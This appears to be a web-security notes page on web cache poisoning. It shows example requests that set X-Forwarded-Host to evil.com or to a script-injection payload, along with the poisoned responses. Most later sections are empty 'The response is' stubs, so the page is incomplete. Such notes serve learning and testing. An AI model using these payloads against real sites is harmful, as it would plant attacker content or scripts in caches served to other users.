Web Cache Poisoning

How to exploit

  1. Basic poisoning

GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: evil.com

The response is

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<img href="https://evil.com/a.png" />

Or you can input XSS payloads

GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: a.\"><script>alert(1)</script>

The response is

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<img href="https://a.\"><script>alert(1)</script>a.png" />

  1. Seizing the Cache

The response is

  1. Selective poisoning

The response is

  1. Chaining Unkeyed Inputs

  • First step

The response is

  • Second step

The response is

  • Third step

The response is

  1. Route Poisoning

The response is

To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com

The response is

  1. Hidden Route Poisoning

The response is

When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:

The response is

PreviousWeb Cache DeceptionNextWeb AppSec Nots

Last updated